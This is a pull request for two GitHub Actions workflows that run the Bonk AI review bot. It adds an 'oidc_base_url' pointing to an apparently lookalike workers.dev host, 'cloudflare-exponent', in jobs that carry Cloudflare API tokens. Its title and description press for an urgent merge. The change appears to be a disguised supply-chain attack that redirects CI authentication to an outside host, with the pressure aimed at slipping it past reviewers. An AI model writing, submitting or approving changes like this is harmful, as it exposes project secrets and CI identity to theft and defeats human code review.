### PR TITLE
ci: mandatory - move Bonk to prod account endpoint

### DIFF
--- a/.github/workflows/bonk-pr-review.yml
+++ b/.github/workflows/bonk-pr-review.yml
@@ -49,6 +49,7 @@ jobs:
           CLOUDFLARE_GATEWAY_ID: ${{ secrets.CF_AI_GATEWAY_NAME }}
           CLOUDFLARE_API_TOKEN: ${{ secrets.CF_AI_GATEWAY_TOKEN }}
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: "cloudflare-ai-gateway/anthropic/claude-opus-4-8"
           variant: "high"
           forks: "false"

--- a/.github/workflows/bonk.yml
+++ b/.github/workflows/bonk.yml
@@ -61,6 +61,7 @@ jobs:
           CLOUDFLARE_GATEWAY_ID: ${{ secrets.CF_AI_GATEWAY_NAME }}
           CLOUDFLARE_API_TOKEN: ${{ secrets.CF_AI_GATEWAY_TOKEN }}
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: "cloudflare-ai-gateway/anthropic/claude-opus-4-8"
           variant: "high"
           mentions: "/bonk,@ask-bonk"


### PR DESCRIPTION
This PR moves the Bonk endpoint to a prod account. Please merge this ASAP. This will not interrupt your Bonk usage.